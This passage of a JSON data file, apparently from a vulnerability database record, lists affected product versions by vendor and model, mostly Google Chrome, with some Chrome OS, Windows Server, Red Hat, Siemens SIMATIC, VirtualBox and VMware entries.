"model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.47" }, { "model": "windows server", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "45.0.2454.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "60.0.3080.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "59.0.3071.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.572.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.786.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "36.0.1985.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1039.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.836.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.23" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.1" }, { "model": "lsrfortessa", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "x-200" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.216" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.591.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "45.0.2454.101" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.107" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.168" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.278.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.413.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.580.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.146" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.513.0" }, { "model": "enterprise linux server extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1042" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.158.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.761.1" }, { "model": "windows server r2", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20120" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.45" }, { "model": "sinumerik pcu", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "50.5" }, { "model": "enterprise linux for ibm z systems", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.130" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.765.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.100" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.553.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.494.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.745.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.484.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1061.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.829.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.482.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1309.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.76" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.14" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "sql server for x64-based systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20170" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.27" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "46.0.2490.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.677.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.890.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "47.0.2526.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.770.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.30" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "64.0.3282.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.364.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "47.0.2526.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.349.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "58.0.3029.96" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.83" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1297.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1026" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1068.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.33" }, { "model": "simatic ipc627d", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.762.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.1" }, { "model": "simatic ipc427c", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.723.1" }, { "model": "enterprise linux server year extended upd", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-47.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.884.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1038" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1068.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.621.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.310" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1006" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.811.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.499.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.709.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.882.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "60.0.3112.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.384.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.118" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.157.2" }, { "model": "simatic hmi ktp mobile panels", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.721.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.76" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.503.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.563.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.1.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.24" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.193.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.771.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.8" }, { "model": "enterprise linux for power little endian extended update supp", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.906.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.169.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.114" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.202" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.363.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.60" }, { "model": "simatic ipc547e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1306.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.601.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.52" }, { "model": "panel designer", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.812.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.944.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.635.0" }, { "model": "simatic s7-1518f-4 pn/dp odk", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.96" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "48.0.2564.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1660.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1047.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.44" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.37" }, { "model": "vsphere integrated containers", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.473.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.441.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1040" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1037.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "40.0.2214.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.104" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.53" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.426.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.752.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.834.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.327.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1654.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.112" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.401.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.493.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.216" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.1.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.103" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "64.0.3282.144" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "59.0.3071.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.327" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.186" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.956.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1662.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.49" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, 